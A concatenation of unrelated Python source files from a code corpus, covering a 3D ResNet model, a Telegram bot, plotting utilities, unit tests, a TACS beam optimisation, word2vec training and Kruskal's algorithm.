feat_ext=False,
use_affine=True):
self.use_affine = use_affine
self.in_planes = 64
self.num_classes = num_classes
self.feat_ext = feat_ext
super(ResNet_IRCSNv2, self).__init__()
self.conv1 = nn.Conv3d(
3,
64,
kernel_size=(3, 7, 7),
stride=(1, 2, 2),
padding=(1, 3, 3),
bias=False)
if use_affine:
self.bn1 = Affine(64)
else:
self.bn1 = nn.BatchNorm3d(64, track_running_stats=True, eps=eps, momentum=bn_mmt)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool3d(kernel_size=(1, 3, 3), stride=(1, 2, 2), padding=(0, 1, 1))
self.layer1 = self._make_layer(block, in_planes=64, planes=64, blocks=block_nums[0],
stride=1, expansion=4)
self.layer2 = self._make_layer(block, in_planes=256, planes=128, blocks=block_nums[1],
stride=2, temporal_stride=2, expansion=4)
self.layer3 = self._make_layer(block, in_planes=512, planes=256, blocks=block_nums[2],
stride=2, temporal_stride=2, expansion=4)
self.layer4 = self._make_layer(block, in_planes=1024, planes=512, blocks=block_nums[3],
stride=2, temporal_stride=2, expansion=4)
self.avgpool = nn.AdaptiveAvgPool3d(output_size=(1, 1, 1))
self.out_fc = nn.Linear(in_features=2048, out_features=num_classes)
def _make_layer(self,
block,
in_planes,
planes,
blocks,
stride=1,
temporal_stride=1,
expansion=4):
if self.use_affine:
down_bn = Affine(planes * expansion)
else:
down_bn = nn.BatchNorm3d(planes * expansion, track_running_stats=True, eps=eps, momentum=bn_mmt)
down_sample = nn.Sequential(
nn.Conv3d(
in_planes,
planes * expansion,
kernel_size=1,
stride=(temporal_stride, stride, stride),
bias=False), down_bn)
layers = []
layers.append(
block(in_planes, planes, stride, temporal_stride, down_sample, expansion,
temporal_kernel=3, use_affine=self.use_affine))
for _ in range(1, blocks):
layers.append(block(planes * expansion, planes, expansion=expansion,
temporal_kernel=3, use_affine=self.use_affine))
return nn.Sequential(*layers)
def forward(self, x):
bs, _, _, _, _ = x.size()
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(bs, -1)
if self.feat_ext:
return x
logits = self.out_fc(x)
return logits
def ircsn_v2_resnet152_f32s2_kinetics400(cfg):
model = ResNet_IRCSNv2(Bottleneck_IRCSNv2,
num_classes=cfg.CONFIG.DATA.NUM_CLASSES,
block_nums=[3, 8, 36, 3],
feat_ext=cfg.CONFIG.INFERENCE.FEAT,
use_affine=cfg.CONFIG.MODEL.USE_AFFINE)
if cfg.CONFIG.MODEL.PRETRAINED:
from ..model_store import get_model_file
model.load_state_dict(torch.load(get_model_file('ircsn_v2_resnet152_f32s2_kinetics400',
tag=cfg.CONFIG.MODEL.PRETRAINED)))
return model
| StarcoderdataPython |
1793401 | import config
import logging
import sys
from telegram.ext import Updater
updater = None
logger = logging.getLogger('bot')
if config.MODE == "dev":
def run(updater):
updater.start_polling()
elif config.MODE == "prod":
def run(updater):
updater.start_webhook(listen="0.0.0.0", port=config.PORT, url_path=config.TOKEN)
updater.bot.set_webhook("https://{}.herokuapp.com/{}".format(config.HEROKU_APP_NAME, config.TOKEN))
else:
logger.error("No MODE specified!")
sys.exit(1)
def send_message(chat_id, text, reply_markup=None):
logger.info('send msg to ' + chat_id)
sendMessage(chat_id=chat_id, text=text, reply_markup=reply_markup)
def add_handlers(handlers):
if type(handlers) != list:
logger.debug('add handler')
updater.dispatcher.add_handler(handlers)
return
logger.debug('add handlers')
for handler in handlers:
updater.dispatcher.add_handler(handler)
def add_error_handlers(handlers):
if type(handlers) != dict:
logger.debug('add error handler')
updater.dispatcher.add_error_handler(handlers)
return
logger.debug('add error handlers')
for handler in handlers:
updater.dispatcher.add_error_handler(handler)
def start():
global updater
logger.info("Starting bot")
if config.MODE == 'dev':
updater = Updater(config.TOKEN, request_kwargs=config.REQUEST_KWARGS, use_context=True)
else:
updater = Updater(config.TOKEN, use_context=True)
run(updater)
| StarcoderdataPython |
3230863 | import matplotlib as mpl
import numpy as np
from polaris2.geomvis import utilmpl
from matplotlib.transforms import Bbox
# Model R2toC2 in the most general case
class xy:
def __init__(self, data, circle=False, title='', xlabel='', toplabel='',
bottomlabel='', colormax=None, fov=1, plotfov=1):
# [idimx, indimy, {outxcomplex, outycomplex}]
# For example: 1000x1000x2 array with complex entries
self.data = data
self.circle = circle
self.title = title
self.xlabel = xlabel
self.toplabel = toplabel
self.bottomlabel = bottomlabel
self.colormax = colormax
self.fov = fov
self.plotfov = plotfov
def plot(self, f, fc, ss):
# Use for placing the title
axs = utilmpl.plot_template(f, fc, title=self.title, scale_bar=False)
axs[0].axis('off')
axs[1].axis('off')
# Custom placement of axes
fx, fy, fw, fh = fc
# Set precise positions of axes
w = 0.375*fw
h = 0.375*fh
# Center coordinates
cx = fx + 0.425*fw
cy = fy + 0.5*fh
# Make three axes
axb = f.add_axes(Bbox([[cx-w,cy-h],[cx,cy]]))
axt = f.add_axes(Bbox([[cx-w,cy],[cx,cy+h]]))
axc = f.add_axes(Bbox([[cx+1*w/4,cy-h/2],[cx+5*w/4,cy+h/2]]))
for ax in [axb, axt, axc]:
ax.tick_params(axis='both', which='both', bottom=False, left=False, labelbottom=False, labelleft=False)
# Scale bar and labels
scale_shift = 0.05*fh
axs[0].annotate('', xy=(cx-w,cy-h-scale_shift), xytext=(cx, cy-h-scale_shift), xycoords='figure fraction', textcoords='figure fraction', va='center', arrowprops=dict(arrowstyle="|-|, widthA=0.5, widthB=0.5", shrinkA=0, shrinkB = 0, lw=.75))
axs[0].annotate(self.xlabel, xy=(1,1), xytext=(cx-w/2,cy-h-0.1*fh), textcoords='figure fraction', ha='center', va='center', rotation=0)
axs[0].annotate(self.toplabel, xy=(1,1), xytext=(cx+w/8,cy+h/2), textcoords='figure fraction', ha='center', va='center', rotation=0)
axs[0].annotate(self.bottomlabel, xy=(1,1), xytext=(cx+w/8,cy-h/2), textcoords='figure fraction', ha='center', va='center', rotation=0)
# For labelling color scale
if self.colormax is None:
self.colormax = np.max(np.abs(self.data))
# Color scale axis
x = np.linspace(-1, 1, 100)
y = np.linspace(-1, 1, 100)
xx, yy = np.meshgrid(x, y)
im = axc.imshow(utilmpl.c2rgb(xx + 1j*yy), interpolation='bicubic', extent=[-1,1,-1,1], origin='lower')
axc.axis('off')
patch = mpl.patches.Circle((0,0), radius=1, linewidth=0.5, facecolor='none',
edgecolor='k', transform=axc.transData, clip_on=False)
im.set_clip_path(patch)
axc.add_patch(patch)
axc.plot([-1,1],[0,0],':k', lw=0.5)
axc.plot([0,0],[-1,1],':k', lw=0.5)
axc.annotate('Im', xy=(1,1), xytext=(0.5,1.1), textcoords='axes fraction', ha='center', va='center', rotation=0)
axc.annotate('Re', xy=(1,1), xytext=(1.1,0.5), textcoords='axes fraction', ha='center', va='center', rotation=0)
axc.annotate('', xy=(0.5,-0.15), xytext=(1, -0.15), xycoords='axes fraction', textcoords='axes fraction', va='center', arrowprops=dict(arrowstyle="|-|, widthA=0.5, widthB=0.5", shrinkA=0, shrinkB = 0, lw=.75))
axc.annotate('{:.2g}'.format(self.colormax), xy=(0,0), xytext=(0.75, -0.25), textcoords='axes fraction', ha='center', va='center', rotation=0)
# Plot
for i, ax in enumerate([axt, axb]):
ax.set_xlim(self.plotfov)
ax.set_ylim(self.plotfov)
image = utilmpl.c2rgb(self.data[:,:,i], rmax=self.colormax)
im = ax.imshow(image.swapaxes(0,1),
interpolation='nearest', extent=2*self.fov, origin='lower')
if self.circle:
ax.axis('off')
patch = mpl.patches.Circle((0,0), radius=self.plotfov[0], linewidth=0.5, facecolor='none',
edgecolor='k', transform=ax.transData, clip_on=False)
im.set_clip_path(patch)
ax.add_patch(patch)
| StarcoderdataPython |
3367288 | # from ..RoutesTable.routesTable import RoutesTable
from ..Status.status import QueryCode
class Packet(object):
# header format: {codeType: xxx, }
# body format: {value: xxx}
def __init__(self, *args):
if len(args) >= 1 and isinstance(args[0], dict) and 'codeType' in args[0]:
self.__header = args[0]
else:
self.__header = {'codeType': QueryCode.Unknown.value}
if len(args) >= 2 and isinstance(args[1], dict) and 'value' in args[1]:
self.__body = args[1]
else:
self.__body = {"value": None}
# print("[packet]: \nheader {} \n body:{}".format(self.__header, self.__body), flush=True)
def setBody(self, data):
self.__body = data
def setHeader(self, codeType):
self.__header['codeType'] = codeType
def toSerializableDict(self):
return {
"header": self.__header,
"body" : self.__body
}
def getHeader(self):
return self.__header.copy()
def getBody(self):
return self.__body.copy()
# def jsonParse(self, obj):
# return Packet(obj.header, obj.body)
if __name__ == '__main__':
pass
| StarcoderdataPython |
3265659 | <filename>tests/test_htmljux.py
import io
import re
import jinja2
import os.path
import logging
import operator
import tempfile
from argparse import Namespace
from unittest import TestCase
from _common import redaction
from shelltools import htmljux
from operator import itemgetter
_log = logging.getLogger(__name__)
def make_transform(**kwargs):
kwargs_ = dict(image_root=None, scheme='file', remove_prefix=None, remove_suffix=None)
kwargs_.update(kwargs)
args = Namespace(**kwargs_)
return htmljux.make_cell_value_transform(args)
class MakeCellValueTransformTest(TestCase):
def test_urlencode(self):
unsafe_path = 'foo/bar:baz~gaw.xyz'
t = make_transform(image_root='/x/y')
actual = t(unsafe_path).url
try:
self.assertEqual("file:///x/y/foo/bar%3Abaz%7Egaw.xyz", actual)
except AssertionError:
self.assertEqual("file:///x/y/foo/bar%3Abaz~gaw.xyz", actual)
def test_scheme_http(self):
cell_value = 'example.com/foo.bar'
t = make_transform(scheme='http')
actual = t(cell_value)
self.assertEqual("http://example.com/foo.bar", actual.url)
self.assertEqual("foo.bar", actual.title)
class PerformTest(TestCase):
def test_perform(self):
csv_text = """\
1,/foo/bar.jpg,/baz/g:url-unsafe:aw.jpg
2,rel/path/c.jpg,/abs/path/d.gif
"""
buffer = io.StringIO()
transform = make_transform(image_root='/x/y')
extractor = htmljux.Extractor(0, None, None, transform)
htmljux.perform(io.StringIO(csv_text), extractor, ofile=buffer)
html = buffer.getvalue()
_log.debug(html)
html = html or None
self.assertIsNotNone(html)
self.assertTrue('file:///baz/g%3Aurl-unsafe%3Aaw.jpg' in html, "URL not found in html")
def test_perform_tab(self):
csv_text = """\
1\t/foo/bar.jpg\t/baz/g:url-unsafe:aw.jpg
caption,with,commas\trel/path/c.jpg\t/abs/pa,t,h/d.gif
"""
buffer = io.StringIO()
transform = make_transform(image_root='/x/y')
extractor = htmljux.Extractor(0, None, {'delimiter': "\t"}, transform)
htmljux.perform(io.StringIO(csv_text), extractor, ofile=buffer)
html = buffer.getvalue()
_log.debug(html)
html = html or None
self.assertIsNotNone(html)
self.assertTrue('/abs/pa%2Ct%2Ch/d.gif' in html, "URL not found in html")
self.assertTrue('>d.gif<' in html, "title not found in html")
self.assertTrue('caption,with,commas' in html, "caption not found in html")
class ModuleTest(TestCase):
def test_main(self):
stderr = io.StringIO()
exit_code = htmljux.main(['--images', '3,a,5'], stderr=stderr)
self.assertEqual(1, exit_code)
content = stderr.getvalue()
self.assertTrue(content or False)
def test_main_print_template(self):
stdout = io.StringIO()
exit_code = htmljux.main(['--print-template'], stdout=stdout)
self.assertEqual(0, exit_code)
content = stdout.getvalue()
self.assertEqual(htmljux.DEFAULT_TEMPLATE, content)
def test_lots_of_options(self):
with tempfile.TemporaryDirectory() as tmpdir:
csv_file = os.path.join(tmpdir, "input.csv")
with open(csv_file, 'w') as ofile:
ofile.write("""\
A,B,C,D,E,F,G,H,I
1,2,ab,cd,ef.xyz,gh,ij,kl.xyz
1,5,mn,op,qr.xyz,st,uv,wx.xyz
2,2,ab,cd,ef.xyz,gh,ij,kl.xyz
3,5,mn,op,qr.xyz,st,uv,wx.xyz
4,2,ab,cd,ef.xyz,gh,yolo,kl.xyz
5,5,mn,op,qr.xyz,st,uv,wx.xyz
1,2,ab,cd,ef.xyz,gh,ij,kl.xyz
3,5,mn,op,yolo.xyz,st,uv,wx.xyz
6,2,ab,cd,ef.xyz,gh,ij,kl.xyz
1,5,mn,op,qr.xyz,st,uv,wx.xyz
""")
redactions_file = os.path.join(tmpdir, "redactions.txt")
with open(redactions_file, 'w') as ofile:
print("yolo", file=ofile)
argl = ["--caption", "0", "--images", "4,7", "--skip", "1",
"--image-root", "/path/to/images",
"--remove-suffix", '.xyz', "--redact-patterns", redactions_file,
"--limit", "5", "--sort=-numeric", csv_file]
buffer = io.StringIO()
exit_code = htmljux.main(argl, stdout=buffer)
html = buffer.getvalue()
_log.debug("\n\n%s\n\n", html)
self.assertIsNotNone(html)
self.assertEqual(0, exit_code)
class RowFiltersTest(TestCase):
def setUp(self):
self.all_rows = [
['3', 'abc', 'def'],
['1', '234', 'xyz'],
['0', 'ert', '41231'],
['8'],
[''],
['x', 'y'],
['oxo', '123', 'yuio'],
]
def _filter_rows(self, predicate, rows=None):
if rows is None:
rows = self.all_rows
return list(map(itemgetter(1), filter(predicate, enumerate(rows))))
def test_make_row_pre_filter_redactor(self):
redactor = redaction.build_filter_from_patterns([re.compile(r'123'), re.compile('^8$'), re.compile('3,abc')])
predicate = htmljux.make_row_pre_filter(None, redactor)
expected = [self.all_rows[i] for i in (0, 1, 4, 5)]
actual = self._filter_rows(predicate)
self.assertListEqual(expected, actual)
def test_make_row_filters_slice(self):
original_rows = list(self.all_rows)
n = len(original_rows)
test_cases = [
# skip, offset, indexes of expected rows
(None, None, range(n)),
(None, 3, range(3)),
(None, 0, []),
(None, 1000, range(n)),
(4, None, range(4, n)),
(4, 1000, range(4, n)),
(2, 3, range(2, 5)),
]
for skip, limit, indexes in test_cases:
with self.subTest():
rows = list(self.all_rows)
expected = [original_rows[i] for i in indexes]
pre_predicate = htmljux.make_row_pre_filter(skip, None)
post_predicate = htmljux.make_row_post_filter(limit)
rows = self._filter_rows(pre_predicate, rows)
rows = self._filter_rows(post_predicate, rows)
self.assertListEqual(expected, rows)
def test_make_row_predicate_redactor_and_limit(self):
redactor = redaction.build_filter_from_patterns([re.compile(r'x')])
pre_predicate = htmljux.make_row_pre_filter(None, redactor)
post_predicate = htmljux.make_row_post_filter(2)
expected = [self.all_rows[i] for i in (0, 2)]
rows = self.all_rows[:4]
rows = self._filter_rows(pre_predicate, rows)
rows = self._filter_rows(post_predicate, rows)
self.assertListEqual(expected, rows)
class MakeSortKeyTest(TestCase):
def test_blah(self):
items = [('10',), ('1',), ('5',)]
sorted_items = sorted(items, key=lambda x: int(x[0]))
self.assertEqual([('1',), ('5',), ('10',)], sorted_items)
def test_make_sort_key(self):
items = ['10', '1', '5']
test_cases = [
# sort_key_def, caption_column, expected
(None, None, ['1', '10', '5']),
(None, 0, ['1', '10', '5']),
('lex', 0, ['1', '10', '5']),
('lexicographical', 0, ['1', '10', '5']),
('numeric', 0, ['1', '5', '10']),
('lex:0', None, ['1', '10', '5']),
('-lex:0', None, reversed(['1', '10', '5'])),
('lexicographical:0', None, ['1', '10', '5']),
('numeric:0', None, ['1', '5', '10']),
('-numeric:0', None, ['10', '5', '1']),
]
to_rows = lambda items_: list(map(lambda x: tuple([x]), items_))
for sort_key_def, caption_column, expected in test_cases:
with self.subTest():
rows = to_rows(items)
sort_key, reverse = htmljux.make_sort_key(sort_key_def, caption_column) or (None, False)
sorted_items = sorted(rows, key=sort_key, reverse=reverse)
expected = to_rows(expected)
self.assertListEqual(expected, sorted_items)
class ExtractorTest(TestCase):
def test__enumerate_rows_sort_numeric(self):
csv_text = """\
10,a,b
1,x,y
5,j,k
"""
sort_key = htmljux.make_sort_key("numeric:0", None)
sorted_rows = list(map(operator.itemgetter(1), htmljux.Extractor()._enumerate_rows(io.StringIO(csv_text), None, sort_key, None)))
self.assertListEqual([['1', 'x', 'y'], ['5', 'j', 'k'], ['10', 'a', 'b']], sorted_rows)
def test__enumerate_rows_sort_and_limit(self):
csv_text = """\
10,a,b
1,x,y
5,j,k
"""
sort_key = htmljux.make_sort_key("-numeric:0", None)
pre_predicate = htmljux.make_row_pre_filter(0, None)
post_predicate = htmljux.make_row_post_filter(2)
sorted_rows = list(
map(operator.itemgetter(1), htmljux.Extractor()._enumerate_rows(io.StringIO(csv_text), pre_predicate, sort_key, post_predicate)))
self.assertListEqual([['10', 'a', 'b'], ['5', 'j', 'k']], sorted_rows)
class RendererTest(TestCase):
def test_render_css(self):
self.do_render(css="""
/* some unique text */
img {
max-width: 400px;
}
""")
def test_render_nocss(self):
self.do_render(css=None)
def do_render(self, css):
env = jinja2.Environment(
autoescape=jinja2.select_autoescape(['html', 'xml'])
)
template = env.from_string(htmljux.DEFAULT_TEMPLATE)
renderer = htmljux.Renderer(template, css)
rows = [
htmljux.Row('hello', [htmljux.Image('file:///tmp/foo.jpg', 'foo'), htmljux.Image('file:///tmp/bar.jpg', 'bar')])
]
page_model = htmljux.PageModel(rows)
html = renderer.render(page_model)
if css:
self.assertIn(css, html) | StarcoderdataPython |
3214744 | from functools import reduce
from typing import Optional, Iterable
class Calc:
def __init__(self, ext_obj=None):
if ext_obj:
# print('Connecting...')
self.external_object = ext_obj
self.external_object.connect()
# print('End connection...')
def add(self, *args):
return sum(args)
def sub(self, a, b):
return a - b
def mul(self, *args):
if not all(args):
raise ValueError
return reduce(lambda x, y: x * y, args)
def div(self, a, b):
try:
return a / b
except ZeroDivisionError:
return 'inf'
def avg(self,
iterable: Iterable,
upper: Optional[int] = None,
lower: Optional[int] = None) -> float:
if upper:
iterable = list(filter(lambda x: x < upper, iterable))
if lower:
iterable = list(filter(lambda x: x > lower, iterable))
if len(iterable) == 0:
return 0
return sum(iterable) / len(iterable)
| StarcoderdataPython |
1689042 | # unittest file for sampling of rotation space SO(3)
import sys
sys.path.append('../')
import pyEMsoft
import numpy as np
import unittest
from random import randint
class Test_SO3(unittest.TestCase):
def setUp(self):
pass
def test_01_IsinsideFZ(self):
# default integer seed vector
seed =pyEMsoft.rng.rng_t()
print('The default seed vector:', seed,'\n')
# seeds the RNG with a single random integer and a default seed vector
seed_rand_int = randint(1, 100000000)
pyEMsoft.rng.rng_seed(seed, seed_rand_int)
print('The new seed vector:', seed, '\n')
q_rand = pyEMsoft.quaternions.quat_marsaglia(seed)
print('Random quaternion using the Marsaglia approach', q_rand, '\n', '\n')
# quaternion to Rodrigues coordinates conversion
rod = pyEMsoft.rotations.qu2ro(q_rand)
# now pick the point group
pyEMsoft.symmetry.listpointgroups()
point_group_number = input('\nSelect a point group:')
print('Point group selected is', point_group_number, '\n')
# now get the FZ type and order
fztype, fzorder = pyEMsoft.so3.getfztypeandorder(point_group_number)
print('FZ type and order for the selected point group ', point_group_number, 'is', fztype,'and', fzorder,'\n')
# is it inside the FZ? return a boolean
insideFZ = pyEMsoft.so3.isinsidefz(rod, fztype, fzorder)
print('Does Rodrigues point', rod, 'lie in the FZ? \nAnswer: %s' % bool(insideFZ), '\n')
def test_02_CubochoricNeighbors(self):
# define an arbitrary quaternion
q = np.asarray([1, 2, 3, 4], dtype=np.float64)
# normaliztion of quaternion
q = q / pyEMsoft.quaternions.cabs(q)
# convert to cubochoric coordinates
cub = pyEMsoft.rotations.qu2cu(q)
# number of nearest neighbor in each direction (should be an odd number for symmetric meshing)
nn = 1
# define the cubneighbor with fortran ordering
cubneighbor = np.asfortranarray(np.zeros([3, (2*nn+1)**3]), dtype=np.float64)
# get the cubochoric coordinates of the neighbors
pyEMsoft.so3.cubochoricneighbors(cubneighbor, nn, cub, 0.1)
print('Cubochoric coordinates of the neighbors:\n', cubneighbor,'\n')
if __name__ == '__main__':
unittest.main() | StarcoderdataPython |
3326662 | """
This example demonstrates TACS structural optimization capabilities.
The beam model that we will be using for this problem is a rectangular beam,
cantilevered, with a shear load applied at the tip. The beam is discretized using
1001 shell elements along it's span and depth.
The optimization problem is as follows:
Minimize the mass of the beam with respect to the depth of the cross-section along the span,
subject to a max stress constraint dictated by the materials yield stress.
In order to change the shape of the FEM we use a free-form deformation (FFD) volume
parmeterization scheme provided by the pyGeo library.
An aproximate analytical solution can be derived from beam theory,
by realizing that the stress at any spanwise cross-section in the beam
can be found independently using:
sigma(x,y) = y*M(x)/I
An analytical solution for this problem can be shown to be:
d(x) = sqrt(6*V*(L-x)/(t*sigma_y))
The optimization is setup using TACS' MPHYS module, which acts as a wrapper
for OpenMDAO.
"""
import numpy as np
import matplotlib.pyplot as plt
import os
import openmdao.api as om
from pygeo.mphys import OM_DVGEOCOMP
from mphys import Multipoint
from mphys.scenario_structural import ScenarioStructural
from tacs.mphys import TacsBuilder
from tacs import elements, constitutive, functions
bdf_file = os.path.join(os.path.dirname(__file__), 'Slender_Beam.bdf')
ffd_file = os.path.join(os.path.dirname(__file__), 'ffd_8_linear.fmt')
# Beam thickness
t = 0.01 # m
# Length of beam
L = 1.0
# Material properties
rho = 2780.0 # kg /m^3
E = 70.0e9
nu = 0.0
ys = 420.0e6
# Shear force applied at tip
V = 2.5E4
# Callback function used to setup TACS element objects and DVs
def element_callback(dvNum, compID, compDescript, elemDescripts, specialDVs, **kwargs):
# Setup (isotropic) property and constitutive objects
prop = constitutive.MaterialProperties(rho=rho, E=E, nu=nu, ys=ys)
con = constitutive.IsoShellConstitutive(prop, t=t, tNum=-1)
# TACS shells are sometimes a little overly-rigid in shear
# We can reduce this effect by decreasing the drilling regularization
con.setDrillingRegularization(0.1)
refAxis = np.array([1.0, 0.0, 0.0])
transform = elements.ShellRefAxisTransform(refAxis)
elem = elements.Quad4Shell(transform, con)
return elem
def problem_setup(scenario_name, fea_assembler, problem):
"""
Helper function to add fixed forces and eval functions
to structural problems used in tacs builder
"""
# Add TACS Functions
problem.addFunction('mass', functions.StructuralMass)
problem.addFunction('ks_vmfailure', functions.KSFailure, safetyFactor=1.0,
ksWeight=100.0)
# Add forces to static problem
problem.addLoadToNodes(1112, [0.0, V, 0.0, 0.0, 0.0, 0.0], nastranOrdering=True)
class Top(Multipoint):
def setup(self):
tacs_options = {'element_callback': element_callback,
'problem_setup': problem_setup,
'mesh_file': bdf_file}
# Initialize MPHYS builder for TACS
struct_builder = TacsBuilder(tacs_options, coupled=False)
struct_builder.initialize(self.comm)
# Add mesh component
self.add_subsystem('mesh', struct_builder.get_mesh_coordinate_subsystem())
# add the geometry component, we dont need a builder because we do it here.
self.add_subsystem("geometry", OM_DVGEOCOMP(ffd_file=ffd_file))
self.geometry.nom_add_discipline_coords("struct")
self.mphys_add_scenario('tip_shear', ScenarioStructural(struct_builder=struct_builder))
self.connect("mesh.x_struct0", "geometry.x_struct_in")
self.connect("geometry.x_struct0", "tip_shear.x_struct0")
def configure(self):
# Create reference axis
nRefAxPts = self.geometry.nom_addRefAxis(name="centerline", alignIndex='i', yFraction=0.5)
# Set up global design variables
def depth(val, geo):
for i in range(nRefAxPts):
geo.scale_y["centerline"].coef[i] = val[i]
self.geometry.nom_addGeoDVGlobal(dvName="depth", value=np.ones(nRefAxPts), func=depth)
################################################################################
# OpenMDAO setup
################################################################################
# Instantiate OpenMDAO problem
prob = om.Problem()
prob.model = Top()
model = prob.model
# Declare design variables, objective, and constraint
model.add_design_var('geometry.depth', lower=1e-3, upper=10.0, scaler=20.0)
model.add_objective('tip_shear.mass', scaler=1.0)
model.add_constraint('tip_shear.ks_vmfailure', lower=0.0, upper=1.0, scaler=1.0)
# Configure optimizer
prob.driver = om.ScipyOptimizeDriver(debug_print=['objs', 'nl_cons'], maxiter=1000)
prob.driver.options['optimizer'] = 'SLSQP'
# Setup OpenMDAO problem
prob.setup()
# Output N2 representation of OpenMDAO model
om.n2(prob, show_browser=False, outfile='beam_opt_n2.html')
# Run optimization
prob.run_driver()
| StarcoderdataPython |
22830 | <reponame>alexk307/server-exercise<gh_stars>0
from requests import post
from random import randrange
from uuid import uuid4
import base64
import json
PORT = 6789
MAX_SIZE_UDP = 65535
HEADER_SIZE = 12
NUM_TRANSACTIONS = 10
SERVER = 'http://localhost:1234/add'
def main():
for i in range(NUM_TRANSACTIONS):
# Psuedo-random transaction ID
transaction_id = randrange(1, 100)
payload = str(uuid4())
# Break into random pieces pieces
l = range(1000)
pieces = randrange(1, 100)
chunks = [l[i:i + pieces] for i in xrange(0, len(l), pieces)]
for chunk in chunks:
fragment = {
'offset': chunk[-1],
'trans_id': transaction_id,
'payload': base64.b64encode(payload),
'size': len(chunk)
}
post(SERVER, json.dumps(fragment))
if __name__ == '__main__':
main()
| StarcoderdataPython |
3303697 | """
given an integer, write a function to determine if it is a power of two
"""
def is_power_of_two(n):
"""
:type n: int
:rtype: bool
"""
return n > 0 and not n & (n - 1)
| StarcoderdataPython |
137699 | <reponame>wull566/tensorflow_demo
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import os
import sys
import multiprocessing
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence
if __name__ == '__main__':
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
# check and process input arguments
# if len(sys.argv) < 4:
# print(globals()['__doc__'] % locals())
# sys.exit(1)
# inp, outp1, outp2 = sys.argv[1:4]
inp, outp1, outp2 = 'data/text8', 'work/text8.model', 'work/text8.vector'
model = Word2Vec(LineSentence(inp), size=800, window=10, min_count=5, sg=1, hs=1,
workers=multiprocessing.cpu_count())
# size: 输出向量维度
# window: 为训练的窗口大小,8表示每个词考虑前8个词与后8个词(实际代码中还有一个随机选窗口的过程,窗口大小<=5)
# window:skip-gram通常在10附近,CBOW通常在5附近
# hs: 如果为1则会采用hierarchica softmax技巧。如果设置为0(defaut),则negative sampling会被使用。
# trim unneeded model memory = use(much) less RAM
# model.init_sims(replace=True)
model.save(outp1)
model.wv.save_word2vec_format(outp2, binary=False) | StarcoderdataPython |
3247123 | import torch
import torch.nn as nn
from src.utils import ScaleNorm, LayerNorm
class Generator(nn.Module):
def __init__(self, d_model, aggregation_type='mean', n_output=1, n_layers=1,
leaky_relu_slope=0.01, dropout=0.0, scale_norm=False):
super(Generator, self).__init__()
if n_layers == 1:
self.proj = nn.Linear(d_model, n_output)
else:
self.proj = []
for i in range(n_layers - 1):
self.proj.append(nn.Linear(d_model, d_model))
self.proj.append(nn.LeakyReLU(leaky_relu_slope))
self.proj.append(ScaleNorm(d_model) if scale_norm else LayerNorm(d_model))
self.proj.append(nn.Dropout(dropout))
self.proj.append(nn.Linear(d_model, n_output))
self.proj = torch.nn.Sequential(*self.proj)
self.aggregation_type = aggregation_type
def forward(self, x, mask):
mask = mask.unsqueeze(-1).float()
out_masked = x * mask
if self.aggregation_type == 'mean':
out_sum = out_masked.sum(dim=1)
mask_sum = mask.sum(dim=(1))
out_avg_pooling = out_sum / mask_sum
elif self.aggregation_type == 'sum':
out_sum = out_masked.sum(dim=1)
out_avg_pooling = out_sum
elif self.aggregation_type == 'dummy_node':
out_avg_pooling = out_masked[:, 0]
projected = self.proj(out_avg_pooling)
return projected
class PositionGenerator(nn.Module):
def __init__(self, d_model, d_atom):
super(PositionGenerator, self).__init__()
self.norm = LayerNorm(d_model)
self.proj = nn.Linear(d_model, d_atom)
def forward(self, x, mask):
mask = mask.unsqueeze(-1).float()
out_masked = self.norm(x) * mask
projected = self.proj(out_masked)
return projected
| StarcoderdataPython |
142007 | <reponame>zembrodt/story-generation<gh_stars>1-10
# encoder.py
import torch
import torch.nn as nn
######################################################################
# The Encoder
# -----------
#
# The encoder of a seq2seq network is a RNN that outputs some value for
# every word from the input sentence. For every input word the encoder
# outputs a vector and a hidden state, and uses the hidden state for the
# next input word.
class EncoderRNN(nn.Module):
def __init__(self, input_size, hidden_size, embedding_size):
super(EncoderRNN, self).__init__()
self.hidden_size = hidden_size
self.embedding = nn.Embedding(input_size, embedding_size)
self.gru = nn.GRU(embedding_size, hidden_size)
def forward(self, input, hidden):
embedded = self.embedding(input).view(1, 1, -1)
output = embedded
output, hidden = self.gru(output, hidden)
return output, hidden
def initHidden(self, device):
return torch.zeros(1, 1, self.hidden_size, device=device) | StarcoderdataPython |
1626598 | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 15:31:17 2016
Last update on Saturday 17 March 2018
@author: michielstock
Kruskal's algorithm for finding the maximum spanning tree
"""
from union_set_forest import USF
import heapq
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
blue = '#264653'
green = '#2a9d8f'
yellow = '#e9c46a'
orange = '#f4a261'
red = '#e76f51'
black = '#50514F'
def add_mst_edges(t, mst_edges, coordinates, ax):
i, j = mst_edges[t]
xi1, xi2 = coordinates[i]
xj1, xj2 = coordinates[j]
ax.plot([xi1, xj1], [xi2, xj2], color=red, lw=5, zorder=1)
def make_mst_animation(coordinates, edges, mst_edges, fig, ax):
# plot edges graph
for w, i, j in edges:
xi1, xi2 = coordinates[i]
xj1, xj2 = coordinates[j]
ax.plot([xi1, xj1], [xi2, xj2], color='grey', alpha=0.7, lw=2, zorder=1)
# plot points
for x1, x2 in coordinates:
ax.scatter(x1, x2, color=green, s=50, zorder=2)
# make animation
anim = FuncAnimation(fig, lambda t : add_mst_edges(t, mst_edges,
coordinates, ax), frames=range(len(mst_edges)), interval=100)
ax.set_yticks([])
ax.set_xticks([])
return anim
def edges_to_adj_list(edges):
"""
Turns a list of edges in an adjecency list (implemented as a list).
Edges don't have to be doubled, will automatically be symmetric
Input:
- edges : a list of weighted edges (e.g. (0.7, 'A', 'B') for an
edge from node A to node B with weigth 0.7)
Output:
- adj_list : a dict of a set of weighted edges
"""
adj_list = {}
for w, i, j in edges:
for v in (i, j):
if v not in adj_list:
adj_list[v] = set([])
adj_list[i].add((w, j))
adj_list[j].add((w, i))
return adj_list
def adj_list_to_edges(adj_list):
"""
Turns an adjecency list in a list of edges (implemented as a list).
Input:
- adj_list : a dict of a set of weighted edges
Output:
